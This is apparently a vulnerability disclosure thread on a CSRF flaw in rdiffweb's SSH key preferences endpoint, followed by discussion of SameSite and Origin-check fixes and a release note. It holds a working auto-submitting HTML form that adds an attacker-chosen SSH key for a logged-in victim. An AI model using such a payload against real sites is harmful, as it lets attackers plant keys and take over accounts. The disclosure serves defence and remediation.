Cross-Site Request Forgery (CSRF) in ikus060/rdiffweb
Reported on
Sep 11th 2021
✍️ Description
Hello dear Rdiffweb team.
I found a CSRF vulnerability on following endpoint that attackers able to Create a SSH key with PoC.html
🕵️♂️ Proof of Concept
User with right privileges should be logged in Firefox or Safari.
Users go to a website that contain PoC.html
3.after visiting attacker's website a SSH key with name bob@thinkpad-t530 will be created.
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://rdiffweb-demo.ikus-soft.com/prefs/sshkeys" method="POST">
<input type="hidden" name="action" value="add" />
<input type="hidden" name="title" value="bob@thinkpad-t530 " />
<input type="hidden" name="key" value="ssh-rsa MIICXAIBAAKBgQCpPefILQKzndiaxLp6M9+AlfZv/UahWXRrZgrGJb8kT8yeCa9U zqtsOlWi58Akp1U3TxMdizqLKA9ivrAFXNc/U/HkqeB73GIprPvYkiL++UxpJQKL bY2ybZK1+I5mWiaGhNec3KSvaTRKXQZpCYnKNM8smlLPc85a3MZs0/iIKQIDAQAB AoGAcf3eVjfq7+xLbsM/DvxNeCCJ4phnsFm+TnBmpVvbSKvvGCtRyv+A+t63u4f5 JTcH8L70ExwqDHypEEt758DGwSa+p7yfxYYNLcmTfjI+Hiqc05WpouwDcCeFvWwH Hrcg/+bbcY17G9PPn54Gcl5LUd0bNFd8hBwzdoKf0OdkX7kCQQD05SMnQNZxdgTG 4BHK1J+Uh2HNDruk6TilPyejPGlGKU72Y/Awt2GQv0ejHIYJznkDgQ2ic3q3yvzX SKZsWvM7AkEAsOqMQIwf0nw3I7zgFsTCsw6Bu46Sot/Qm0bZhNaDfyRGt5LodW5t aZkBZPZyMe8GNvKY1Y7KVPKRYYndJKuz6wJBAOTdS1gA2SfZ8qblettCkAxf5T+c +DIrHxwXhHSiHYRLUJclWLA+gPikOk+udXmusxtaPSLHpzUih96t75IuAUcCQHy8 MjzETx95ourYnWqQOfJDFScnI64gfZUtQ+oL0NTQv+dodett+0iLr1b/B467Rzdw nl9b+L4h9Gy/5iKXyRcCQCoyLH3foTFcEigySYkgdfdGv9LpWDPb9y0c2pbGJDcr 6moUZy5AQ3r4oJmpYoJQWpzUKk5FGTBkSnHo917J9Mg=" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Also attacker can send multiple request with help of Iframes.
Fix
I just want to suggest you to set a CSRF token for this form.
Hey amammad, I've opened a PR on the repo asking for a security policy with email.
@admin hey admin
They already put theier email in 25 days ago !!!
@amammad
I'm working on a different implementation because adding csrf token in every form break few integration for my customer. That said, I'm working on another mitigation to validate the Origin and Referer. That should cover all endpoint and future endpoint too.
Any thought on the subject ?
first option:
You can set SameSite attribute to strict for all cookies and I heard that this can be make some problems that I don't know what kind of problems.
second option:
But you can Also set SameSite attribute to Lax for all cookies that it is a appropriate options But beside Lax you should only accept request with http POST method and use GET method Only when clients want to receive information not change them.
with these two options you can have protection against CSRF protection.
In my opinion checking for origin header is non-standard and old implementation as we have SameSite attribute for cookies there isn't need to implement something else.
I thing you can read about strict SameSite and then if you didn't find any problem, this can the easiest fix.
@amammad
I'm glad you talked about SameSite=Lax, I've also added this functionalities yesterday. I will complete the changes by adding unit test for all of this and it should be good.
Thanks !
When you finish the tests you and release new version you can put comment here and if I found more CSRF issues I will report them from Huntr.
Changes are completed and release in rdiffweb 2.3.7